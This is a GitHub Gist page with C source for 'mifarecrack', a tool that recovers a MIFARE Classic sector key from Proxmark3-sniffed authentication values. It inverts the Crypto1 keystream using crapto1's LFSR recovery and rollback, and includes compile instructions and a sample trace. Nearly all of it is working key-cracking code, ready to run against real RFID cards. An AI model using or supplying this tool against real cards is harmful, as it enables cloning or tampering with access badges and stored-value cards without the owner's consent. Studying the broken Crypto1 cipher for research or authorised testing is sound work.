Created
March 26, 2020 04:53
-
-
Save SimonTheCoder/78f1f91db383854e2cc631b8401370e9 to your computer and use it in GitHub Desktop.
Find key from proxmark3 sniff data. found here: http://www.proxmark.org/files/Various%20Software/MIFARE%20Classic/mifarecrack/ . Compile : 1 clone https://github.com/nfc-tools/mfcuk; 2 gcc -O3 -o mifarecrack crapto1.c crypto1.c mifarecrack.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ported from Test-file: test2.c for crapto1-v2.2 | |
// ver 2: fixed key ordering in output | |
// ver 3: allow direct cut & paste from sniffer log | |
#include "crapto1.h" | |
#include <stdio.h> | |
#include <string.h> | |
// Proxmark3 sniffer log | |
// | |
// TAG UID (uid) | |
// + 64: 0: TAG 5c 72 32 5e 42 | |
// ^^^^^^^^^^^^^^ -> UID | |
// | |
// TAG CHALLENGE (tag_challenge) | |
// + 13542: : 60 00 f5 7b | |
// ^^ -> read sector #00 | |
// + 112: 0: TAG 50 82 9c d6 | |
// ^^^^^^^^^^^^^^ -> tag challenge | |
// | |
// READER CHALLENGE (nr_enc) | |
// + 976: : b8 67 1f 76 e0 0e ef c9 !crc | |
// reader challenge-> ^^^^^^^^^^^^^^ | |
// | |
// READER RESPONSE (reader_response) | |
// + 976: : b8 67 1f 76 e0 0e ef c9 !crc | |
// ^^^^^^^^^^^^^^ -> reader resonse | |
// | |
// TAG RESPONSE (tag_response) | |
// + 64: 0: TAG 48! 88 96 4f | |
// ^^^^^^^^^^^^^^ -> tag response | |
int main (int argc, char **argv) | |
{ | |
struct Crypto1State *revstate; | |
uint64_t lfsr; | |
unsigned char* plfsr = (unsigned char*)&lfsr; | |
uint32_t uid; | |
uint32_t tag_challenge; | |
uint32_t nr_enc; | |
uint32_t reader_response; | |
uint32_t tag_response; | |
uint32_t ks2; | |
uint32_t ks3; | |
int i,j; | |
unsigned char newargv[5][11]; | |
// | |
// hard-wired example | |
// | |
// uid= strtoul("0x5c72325e",NULL,16); | |
// tag_challenge= strtoul("0x50829cd6",NULL,16); | |
// nr_enc= strtoul("0xb8671f76",NULL,16); | |
// reader_response= strtoul("0xe00eefc9",NULL,16); | |
// tag_response= strtoul("0x4888964f",NULL,16); | |
// | |
// take values from command line | |
// | |
// ./mifarecrack 0x5c72325e 0x50829cd6 0xb8671f76 0xe00eefc9 0x4888964f | |
// | |
if (argc != 6 && argc != 21) | |
{ | |
printf("\n usage: mifarecrack <UID> <TAG CHALLENGE> <READER CHALLENGE> <READER RESPONSE> <TAG RESPONSE>\n"); | |
printf(" or: mifarecrack <CUT & PASTE FROM SNIFFER LOG>\n"); | |
printf("\n"); | |
printf(" example: mifarecrack 0x5c72325e 0x50829cd6 0xb8671f76 0xe00eefc9 0x4888964f\n"); | |
printf(" or: mifarecrack 5c 72 32 5e 50 82 9c d6 b8 67 1f 76 e0 0e ef c9 48! 88 96 4f\n"); | |
printf("\n"); | |
printf(" should produce the output:\n"); | |
printf("\n"); | |
printf(" uid: 5c72325e\n"); | |
printf(" nt': 73ba72d6\n"); | |
printf(" nt'': 93c7b940\n"); | |
printf(" ks2: 93b49d1f\n"); | |
printf(" ks3: db4f2f0f\n"); | |
printf("\n"); | |
printf(" Found Key: [ff ff ff ff ff ff]\n"); | |
printf("\n"); | |
return -1; | |
} | |
// concatonate direct pasted sniff elements | |
if (argc == 21) | |
for (i= 0; i < 5; ++i) | |
{ | |
for (j= 0 ; j < 4 ; ++j) | |
memcpy(&newargv[i][j*2],argv[(i*4)+j+1],2); | |
newargv[i][8]= '\0'; | |
} | |
else | |
for (i= 0; i < 5; ++i) | |
memcpy(&newargv[i][0],argv[i+1],11); | |
uid= strtoul(newargv[0],NULL,16); | |
tag_challenge= strtoul(newargv[1],NULL,16); | |
nr_enc= strtoul(newargv[2],NULL,16); | |
reader_response= strtoul(newargv[3],NULL,16); | |
tag_response= strtoul(newargv[4],NULL,16); | |
ks2= reader_response ^ prng_successor(tag_challenge, 64); | |
ks3= tag_response ^ prng_successor(tag_challenge, 96); | |
printf("\n"); | |
printf(" uid: %08x\n",uid); | |
printf(" nt': %08x\n",prng_successor(tag_challenge, 64)); | |
printf(" nt'': %08x\n",prng_successor(tag_challenge, 96)); | |
printf(" ks2: %08x\n",ks2); | |
printf(" ks3: %08x\n",ks3); | |
revstate = lfsr_recovery64(ks2, ks3); | |
#define lfsr_rollback lfsr_rollback_word //add by 51m0n | |
lfsr_rollback(revstate, 0, 0); | |
lfsr_rollback(revstate, 0, 0); | |
lfsr_rollback(revstate, nr_enc, 1); | |
lfsr_rollback(revstate, uid ^ tag_challenge, 0); | |
crypto1_get_lfsr(revstate, &lfsr); | |
printf("\n Found Key: [%02x %02x %02x %02x %02x %02x]\n\n",plfsr[5],plfsr[4],plfsr[3],plfsr[2],plfsr[1],plfsr[0]); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment